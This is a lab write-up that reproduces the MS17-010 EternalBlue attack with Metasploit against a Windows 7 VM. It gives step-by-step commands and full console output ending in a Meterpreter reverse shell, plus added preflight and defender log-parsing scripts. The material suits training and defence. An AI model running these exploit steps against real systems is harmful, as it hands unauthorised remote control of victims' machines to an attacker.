I. Experiment title
Windows network service penetration testing practice: reproducing the MS17-010 vulnerability
II. Experiment purpose and requirements
Become familiar with how to use the Metasploit console;
Master the method of attacking the MS17-010 vulnerability.
III. Reproduction steps (with text explanation and screenshots)
1. NAT mode
Kali-Linux: 192.168.232.141
Windows 7: 192.168.232.142
2. Check the IP addresses
kali: ip a
win7: ipconfig
3. Restart the network interface
service networking restart
4. Test connectivity
kali: ping 192.168.232.142
5. Enter the msf console
msfconsole
6. Search for the vulnerability modules
search ms17-010
7. Use the scanner module
use auxiliary/scanner/smb/smb_ms17_010
8. View options
show options
9. Configure
set rhost 192.168.232.142
set rport 445
10. Verify
run
exploit
11. Use the exploit module
use exploit/windows/smb/ms17_010_eternalblue
12. View options
show options
13. Configure
set lhost 192.168.232.141
set lport 4444
set rhost 192.168.232.142
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
14. Attack
run
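A frequent reason this lab fails is that LHOST and RHOST are typed from a different subnet than the one `ip a` actually shows on the Kali host, so the target is unreachable or the reverse handler is never contacted. The following Python preflight check is an added example and not part of the write-up: it parses `ip a` output (a constructed sample modelled on the capture below), then confirms that LHOST is a local address, that RHOST is a different host on a directly attached subnet, and that the ports are valid. The function names `parse_ip_a` and `preflight` are this example's own.

```python
import ipaddress
import re

# Constructed sample of `ip a` output on the attacking Kali host, modelled on
# the capture in this write-up (it is not the page's own text).
IP_A_OUTPUT = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    inet 192.168.232.141/24 brd 192.168.232.255 scope global dynamic noprefixroute eth0
       valid_lft 1753sec preferred_lft 1753sec
"""

# "2: eth0: <...>" -> interface name; "    inet 192.168.232.141/24 ..." -> address
IFACE_RE = re.compile(r"^\d+: (?P<name>[^:@]+)")
INET_RE = re.compile(r"^\s+inet (?P<cidr>\d+\.\d+\.\d+\.\d+/\d+)\b")


def parse_ip_a(text):
    """Map each interface name to its IPv4 addresses (with prefix length)."""
    addrs = {}
    current = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m["name"]
            addrs.setdefault(current, [])
            continue
        m = INET_RE.match(line)
        if m and current is not None:
            addrs[current].append(ipaddress.ip_interface(m["cidr"]))
    return addrs


def preflight(ip_a_text, lhost, rhost, lport=4444, rport=445):
    """Return a list of problems with the chosen module options; empty means OK."""
    problems = []
    local = [a for addrs in parse_ip_a(ip_a_text).values()
             for a in addrs if not a.ip.is_loopback]
    lh = ipaddress.ip_address(lhost)
    rh = ipaddress.ip_address(rhost)

    # The payload connects back to LHOST, so it must be an address we own.
    if not any(a.ip == lh for a in local):
        problems.append(f"LHOST {lhost} is not configured on any local interface; "
                        "the reverse handler cannot be reached")

    # RHOST must be another machine, and in a NAT lab it should sit on our subnet.
    if rh.is_loopback or any(a.ip == rh for a in local):
        problems.append(f"RHOST {rhost} is the local machine, not the lab target")
    elif not any(rh in a.network for a in local):
        nets = ", ".join(str(a.network) for a in local)
        problems.append(f"RHOST {rhost} is not on a directly attached subnet ({nets}); "
                        "check the VM network mode")

    for label, port in (("LPORT", lport), ("RPORT", rport)):
        if not 1 <= port <= 65535:
            problems.append(f"{label} {port} is not a valid TCP port")
    return problems


if __name__ == "__main__":
    # The first pair matches the lab setup; the second uses a mistyped subnet.
    for lhost, rhost in (("192.168.232.141", "192.168.232.142"),
                         ("192.168.237.132", "192.168.237.150")):
        print(lhost, rhost, preflight(IP_A_OUTPUT, lhost, rhost) or ["OK"])
```

Run it with the real `ip a` output piped in from the attacking VM before typing the `set` commands; an empty result means the addresses are at least consistent with the interfaces the host actually has.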
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a                                                                  148 ⨯ 1 ⚙
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.232.141/24 brd 192.168.232.255 scope global dynamic noprefixroute eth0
       valid_lft 1753sec preferred_lft 1753sec
    inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 192.168.232.142 1 ⚙
PING 192.168.232.142 (192.168.232.142) 56(84) bytes of data.
64 bytes from 192.168.232.142: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.232.142: icmp_seq=2 ttl=128 time=1.19 ms
64 bytes from 192.168.232.142: icmp_seq=3 ttl=128 time=0.565 ms
64 bytes from 192.168.232.142: icmp_seq=4 ttl=128 time=0.367 ms
64 bytes from 192.168.232.142: icmp_seq=5 ttl=128 time=0.487 ms
64 bytes from 192.168.232.142: icmp_seq=6 ttl=128 time=0.658 ms
64 bytes from 192.168.232.142: icmp_seq=7 ttl=128 time=0.346 ms
64 bytes from 192.168.232.142: icmp_seq=8 ttl=128 time=0.556 ms
^Z
zsh: suspended ping 192.168.232.142
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole 148 ⨯ 2 ⚙
[Metasploit ASCII-art banner omitted: "To boldly go where no shell has gone before"]
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Start commands with a space to avoid saving
them to history
msf6 > search ms17-010
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_et
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms17_010_eternalblue
[*] Using exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.232.141  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.232.141
lhost => 192.168.232.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.232.141:4444
[*] 192.168.232.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.232.142:445 - The target is vulnerable.
[*] 192.168.232.142:445 - Connecting to target for exploitation.
[+] 192.168.232.142:445 - Connection established for exploitation.
[+] 192.168.232.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.232.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.232.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.232.142:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.232.142:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.232.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.232.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.232.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.232.142:445 - Starting non-paged pool grooming
[+] 192.168.232.142:445 - Sending SMBv2 buffers
[+] 192.168.232.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.232.142:445 - Sending final SMBv2 buffers.
[*] 192.168.232.142:445 - Sending last fragment of exploit packet!
[*] 192.168.232.142:445 - Receiving response from exploit packet
[+] 192.168.232.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.232.142:445 - Sending egg to corrupted connection.
[*] 192.168.232.142:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.232.142
[*] Meterpreter session 1 opened (192.168.232.141:4444 -> 192.168.232.142:49717) at 2022-05-16 05:22:53 -0400
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:0c:d1:dc
MTU : 1500
IPv4 Address : 192.168.232.142
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6d7a:d608:7ec3:80e
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:e88e
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
Interface 15
============
Name : Bluetooth vc6
Hardware MAC : c0:3c:59:b9:be:40
MTU : 1500
IPv4 Address : 169.254.121.120
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::2898:c717:bd6d:7978
IPv6 Netmask : ffff:ffff:ffff:ffff::
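To turn a run like the one above into something a defender can act on, the following Python script is an added example (not part of the write-up or of Metasploit): it folds the scanner's `Host is likely VULNERABLE` lines, the `Scanned N of N hosts` lines and the `Meterpreter session N opened` line of msfconsole output into one record per host, and maps each record to the remediation it implies. The console text is constructed from the message formats shown in the capture; the second host, 192.168.232.150, is invented and was only scanned. The names `HostRecord`, `parse_console` and `remediation` are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of msfconsole output, modelled on the scanner and exploit
# lines this write-up shows; it is not the page's own capture. The second host
# (192.168.232.150) is made up and produced no vulnerable finding.
SAMPLE_CONSOLE = """\
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] Started reverse TCP handler on 192.168.232.141:4444
[*] Sending stage (200262 bytes) to 192.168.232.142
[*] Meterpreter session 1 opened (192.168.232.141:4444 -> 192.168.232.142:49717) at 2022-05-16 05:22:53 -0400
[*] 192.168.232.150:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
VULN_RE = re.compile(
    rf"^\[\+\] (?P<host>{IPV4}):(?P<port>\d+) - Host is likely VULNERABLE to MS17-010! - (?P<os>.+)$")
SCANNED_RE = re.compile(
    rf"^\[\*\] (?P<host>{IPV4}):(?P<port>\d+) - Scanned \d+ of \d+ hosts")
SESSION_RE = re.compile(
    rf"^\[\*\] Meterpreter session (?P<sid>\d+) opened \({IPV4}:\d+ -> (?P<host>{IPV4}):\d+\)")


@dataclass
class HostRecord:
    host: str
    port: int                      # SMB port scanned (0 if only a session line was seen)
    status: str = "scanned"        # scanned -> vulnerable -> compromised
    os_banner: str = ""
    session_id: Optional[int] = None


def parse_console(text: str) -> Dict[str, HostRecord]:
    """Fold console lines into one record per target host."""
    records: Dict[str, HostRecord] = {}
    for line in text.splitlines():
        m = SCANNED_RE.match(line)
        if m:
            records.setdefault(m["host"], HostRecord(m["host"], int(m["port"])))
            continue
        m = VULN_RE.match(line)
        if m:
            rec = records.setdefault(m["host"], HostRecord(m["host"], int(m["port"])))
            rec.os_banner = m["os"].strip()
            if rec.status != "compromised":   # never downgrade a host that already has a session
                rec.status = "vulnerable"
            continue
        m = SESSION_RE.match(line)
        if m:
            rec = records.setdefault(m["host"], HostRecord(m["host"], 0))
            rec.status = "compromised"
            rec.session_id = int(m["sid"])
    return records


def remediation(rec: HostRecord) -> List[str]:
    """Defender actions implied by a record; a host that was only scanned needs none."""
    if rec.status == "scanned":
        return []
    actions = [
        "Install the MS17-010 security update (KB4012212 / KB4012215 for Windows 7 SP1 and Server 2008 R2)",
        "Disable SMBv1; the exploit path shown above opens an SMBv1 connection to TCP/445",
        "Restrict TCP/445 to hosts that need it and alert on new inbound SMB connections",
    ]
    if rec.status == "compromised":
        actions.insert(0, f"Meterpreter session {rec.session_id} was opened: isolate and rebuild the host, "
                          "patching alone is not enough")
    return actions


if __name__ == "__main__":
    for rec in parse_console(SAMPLE_CONSOLE).values():
        print(f"{rec.host}:{rec.port} {rec.status} {rec.os_banner}".rstrip())
        for action in remediation(rec):
            print("  -", action)
```

The same parser works on the output of a scan-only run (step 10), where no session line ever appears and every flagged host ends up as `vulnerable`; feed it the console log saved with `spool` and the result is a per-host list that can go straight into a ticket.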